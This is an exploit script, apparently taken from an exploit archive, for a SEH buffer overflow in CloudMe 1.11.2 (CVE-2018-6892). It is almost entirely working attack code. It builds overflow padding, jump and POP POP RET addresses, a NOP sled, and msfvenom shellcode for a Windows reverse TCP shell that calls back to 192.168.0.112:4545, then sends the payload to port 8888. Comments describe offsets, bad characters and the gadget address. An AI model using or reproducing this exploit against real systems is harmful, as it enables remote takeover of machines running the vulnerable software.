Share
## https://sploitus.com/exploit?id=1337DAY-ID-34779
import socket
import sys

target = "127.0.0.1"

#Written by : lutzenfried (Clement Cruchet)
#Exploiting CloudMe 1.11.2 (Publisher : CloudMe AB)
#Windows x64 10.0.18362 Build 18362
#Buffer Overflow using SEH overwritten technic (POP POP RET)
#Exploit for CVE-2018-6892

#Technical information used for exploit development
#Register EIP is overwritten with pattern at position 1052 in thread 1676
#SEH register is overwritten with pattern at position 2344 in thread 1676
#Bad characters : \x00\x0A\x0D
#0x61f2ba2e | pop edi, pop ebp, ret | False |  False   |  False   |   False   |  False  |  C:\Users\user1\AppData\Local\Programs\CloudMe\CloudMe\Qt5Gui.dll

buf = "\x41" * 2344
seh = "\xEB\x08\x90\x90" #Replace to short JMP
nseh = "\x2e\xba\xf2\x61" #Replace to POP POP RET
nopsled = b"\x90"*20 #NOP sled to go into payload

#msfvenom -a x86 -p windows/shell/reverse_tcp LHOST=192.168.0.112 LPORT=4545 -b '\x00\x0A\x0D' -f python
payload =  b""
payload += b"\xda\xdb\xbf\x52\xf0\xea\x4a\xd9\x74\x24\xf4\x58\x33"
payload += b"\xc9\xb1\x56\x83\xe8\xfc\x31\x78\x14\x03\x78\x46\x12"
payload += b"\x1f\xb6\x8e\x50\xe0\x47\x4e\x35\x68\xa2\x7f\x75\x0e"
payload += b"\xa6\x2f\x45\x44\xea\xc3\x2e\x08\x1f\x50\x42\x85\x10"
payload += b"\xd1\xe9\xf3\x1f\xe2\x42\xc7\x3e\x60\x99\x14\xe1\x59"
payload += b"\x52\x69\xe0\x9e\x8f\x80\xb0\x77\xdb\x37\x25\xfc\x91"
payload += b"\x8b\xce\x4e\x37\x8c\x33\x06\x36\xbd\xe5\x1d\x61\x1d"
payload += b"\x07\xf2\x19\x14\x1f\x17\x27\xee\x94\xe3\xd3\xf1\x7c"
payload += b"\x3a\x1b\x5d\x41\xf3\xee\x9f\x85\x33\x11\xea\xff\x40"
payload += b"\xac\xed\x3b\x3b\x6a\x7b\xd8\x9b\xf9\xdb\x04\x1a\x2d"
payload += b"\xbd\xcf\x10\x9a\xc9\x88\x34\x1d\x1d\xa3\x40\x96\xa0"
payload += b"\x64\xc1\xec\x86\xa0\x8a\xb7\xa7\xf1\x76\x19\xd7\xe2"
payload += b"\xd9\xc6\x7d\x68\xf7\x13\x0c\x33\x9f\xd0\x3d\xcc\x5f"
payload += b"\x7f\x35\xbf\x6d\x20\xed\x57\xdd\xa9\x2b\xaf\x54\xbd"
payload += b"\xcb\x7f\xde\xae\x35\x80\x1e\xe6\xf1\xd4\x4e\x90\xd0"
payload += b"\x54\x05\x60\xdc\x80\xb3\x6a\x4a\x21\x49\x65\xbf\x5d"
payload += b"\x4f\x79\xae\x5c\xc6\x9f\x80\x0e\x88\x0f\x61\xff\x68"
payload += b"\xe0\x09\x15\x67\xdf\x2a\x16\xa2\x48\xc0\xf9\x1a\x20"
payload += b"\x7d\x63\x07\xba\x1c\x6c\x92\xc6\x1f\xe6\x16\x36\xd1"
payload += b"\x0f\x53\x24\x06\x68\x9b\xb4\xd7\x1d\x9b\xde\xd3\xb7"
payload += b"\xcc\x76\xde\xee\x3a\xd9\x21\xc5\x39\x1e\xdd\x98\x0b"
payload += b"\x54\xe8\x0e\x33\x02\x15\xdf\xb3\xd2\x43\xb5\xb3\xba"
payload += b"\x33\xed\xe0\xdf\x3b\x38\x95\x73\xae\xc3\xcf\x20\x79"
payload += b"\xac\xed\x1f\x4d\x73\x0e\x4a\xcd\x74\xf0\x08\xfa\xdc"
payload += b"\x98\xf2\xba\xdc\x58\x99\x3a\x8d\x30\x56\x14\x22\xf0"
payload += b"\x97\xbf\x6b\x98\x12\x2e\xd9\x39\x22\x7b\xbf\xe7\x23"
payload += b"\x88\x64\x18\x59\xe1\x9b\xd9\x9e\xeb\xff\xda\x9e\x13"
payload += b"\xfe\xe7\x48\x2a\x74\x26\x49\x09\x87\x1d\xec\x38\x02"
payload += b"\x5d\xa2\x3b\x07"


run = buf + seh + nseh + nopsled + payload

try:
  s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((target,8888))
  s.send(run)

except Exception as e:
  print(sys.exc_value)

#  0day.today [2020-08-05]  #